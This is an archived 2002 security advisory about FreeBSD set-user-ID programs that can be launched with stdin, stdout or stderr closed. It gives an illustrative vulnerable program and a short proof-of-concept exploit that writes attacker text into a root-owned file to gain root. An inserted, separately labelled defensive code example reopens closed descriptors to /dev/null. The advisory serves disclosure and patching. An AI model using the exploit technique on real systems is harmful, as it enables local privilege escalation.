OSEC

From: Patrick Oonk (patrickpine.nl)
Date: Mon Apr 22 2002 - 03:58:25 CDT


     -----------------------------------------------------------------------------
     Pine Internet Security Advisory
     -----------------------------------------------------------------------------
     Advisory ID : PINE-CERT-20020401
     Authors : Joost Pol <joostpine.nl>
     Issue date : 2002-04-22
     Application : Multiple
     Version(s) : Multiple
     Platforms : FreeBSD confirmed, maybe others.
     Vendor informed : 20020406
     Availability : http://www.pine.nl/advisories/pine-cert-20020401.txt
     -----------------------------------------------------------------------------

    Synopsis

            It is possible for a local user to execute a suid application with
            stdin, stdout or stderr closed.

    Impact

            HIGH. Local users should be able to gain root privileges.

    Description

            Consider the following (imaginary) suid application:

            -- begin of imaginary code snippet

                    #include <stdio.h>

                    int main(int argc, char **argv)
                    {
                            /* If the caller closed descriptor 2 before exec(),
                               this fopen() is handed descriptor 2, so from here
                               on stderr refers to the root-owned file. */
                            FILE * f = fopen("/etc/root_owned_file", "r+");

                            if(f) {
                                    /* goes into the file, not to the terminal */
                                    fprintf(stderr, "%s: fopen() succeeded\n", argv[0]);

                                    fclose(f);
                            }
                            return 0;
                    }

            -- end of imaginary code snippet
                    
            Now, consider the following (imaginary) exploit:

            -- begin of imaginary exploit snippet

                    #include <unistd.h>

                    int main(void)
                    {
                            /* use up every free descriptor, then free only 2 */
                            while(dup(1) != -1);

                            close(2);

                            /* argv[0] is what the suid program prints to stderr */
                            execl("/path/to/suid_application",
                                  "this text will end up in the root_owned_file",
                                  (char *)0);
                            return 1;
                    }

            -- end of imaginary exploit snippet

            Exploitation has been confirmed using the S/KEY binaries.
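            The descriptor reuse described above, as an added example that is not part of the advisory or of the FreeBSD fix: sanitize_std_fds() is the defensive pattern of pointing any closed descriptor among 0, 1 and 2 at /dev/null before a set-id program does any other work, and stderr_hits_file() replays the scenario on a constructed scratch file with and without that step. The function names and the scratch path are assumptions.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Point any closed descriptor among 0, 1 and 2 at /dev/null.  Returns how
 * many were reopened, or -1 if that fails; on -1 a set-id program should
 * exit, because continuing with a free low descriptor is the unsafe state. */
int sanitize_std_fds(void)
{
    int fixed = 0;
    for (int fd = 0; fd <= 2; fd++) {
        if (fcntl(fd, F_GETFD) != -1 || errno != EBADF)
            continue;                       /* already open: leave it alone */
        /* open() returns the lowest free descriptor, which must be fd itself
         * because 0..fd-1 are all open by now; anything else is an error. */
        int nullfd = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
        if (nullfd != fd)
            return -1;
        fixed++;
    }
    return fixed;
}

/* Replay the advisory's scenario on a scratch file (constructed content
 * "orig"): close stderr, optionally sanitize, then run the imaginary suid
 * program's logic.  Returns 1 if the stderr message overwrote the file. */
int stderr_hits_file(const char *path, int sanitize)
{
    FILE *w = fopen(path, "w");
    if (!w || fputs("orig", w) < 0 || fclose(w) != 0)
        return -1;
    int saved = dup(2);                     /* keep the real stderr */
    close(2);
    if (!sanitize || sanitize_std_fds() >= 0) {
        FILE *f = fopen(path, "r+");       /* lands on fd 2 if unsanitized */
        if (f) {
            fprintf(stderr, "X");           /* stderr is unbuffered: fd 2 */
            fclose(f);
        }
    }
    dup2(saved, 2);                         /* restore stderr */
    close(saved);
    FILE *r = fopen(path, "r");
    int c = r ? fgetc(r) : EOF;
    if (r) fclose(r);
    return c == 'X';
}
```

            Calling stderr_hits_file() with sanitize set to 0 returns 1 (the file now starts with "X"), and with sanitize set to 1 returns 0, because fopen() then receives descriptor 3 and the stderr write goes to /dev/null.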

    Solution

            FreeBSD source trees have been updated on the 21st of April 2002.
            Please update your sources with cvsup.


    -- 
     patrick oonk - pine internet - patrickpine.nl - www.pine.nl/~patrick
     T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl 
     PGPid A4E74BBF  fp A7CF 7611 E8C4 7B79 CA36  0BFD 2CB4 7283 A4E7 4BBF
     Note: my NEW PGP key is available at http://www.pine.nl/~patrick/
     Excuse of the day: it has Intel Inside